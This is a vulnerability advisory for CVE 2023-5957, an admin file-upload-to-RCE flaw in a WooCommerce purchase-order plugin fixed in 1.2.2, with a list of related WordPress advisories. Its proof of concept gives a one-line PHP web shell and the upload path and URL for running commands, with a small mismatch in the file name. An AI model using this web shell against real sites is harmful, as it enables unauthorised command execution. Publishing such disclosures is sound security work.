Ni Purchase Order(PO) For WooCommerce < 1.2.2 – Admin+ File Upload to Remote Code Execution | CVE 2023-5957 | Plugin Vulnerabilities

Description

The plugin does not validate logo and signature image files uploaded in the settings, allowing high privileged user to upload arbitrary files to the web server, triggering an RCE vulnerability by uploading a web shell.

Proof of Concept

1. Create a malicious file `exploit.php` with the contents `<?php echo system($_GET['cmd']); ?>` 
2. Visit https://example.com/wordpress/wp-admin/admin.php?page=niwoopo-setting
3. Select the `cmd.php` file in the Logo or Signature section and save the settings. The file will be accessible at https://example.com/wordpress/wp-content/uploads/ni-purchase-order/cmd.php?cmd=ls and it will show a directory listing

Affects Plugins

ni-purchase-orderpo-for-woocommerce

Fixed in 1.2.2

References

CVE

YouTube Video

Classification

Type

RCE

OWASP top 10

CWE

Miscellaneous

Original Researcher

Dao Xuan Hieu

Submitter

Dao Xuan Hieu

Verified

Yes

WPVDB ID

70f823ff-64ad-4f05-9eb3-b69b3b79dc12

Timeline

Publicly Published

2023-09-26 (about 7 months ago)

Added

2023-12-12 (about 5 months ago)

Last Updated

2024-03-21 (about 1 months ago)

Other

Published

Title

Published

2023-10-30

Title

Ads by datafeedr.com < 1.2.0 - Unauthenticated Remote Code Execution

Published

2022-07-01

Title

WP All Import < 3.6.8 - Admin+ Arbitrary File Upload

Published

2015-12-02

Title

Cool Video Gallery < 2.0 - Authenticated Command Injection

Published

2021-05-09

Title

All in One SEO Pack < 4.1.0.2 - Admin RCE via unserialize

Published

2023-09-19

Title

File Manager Pro < 1.8.1 - Admin+ Remote Code Execution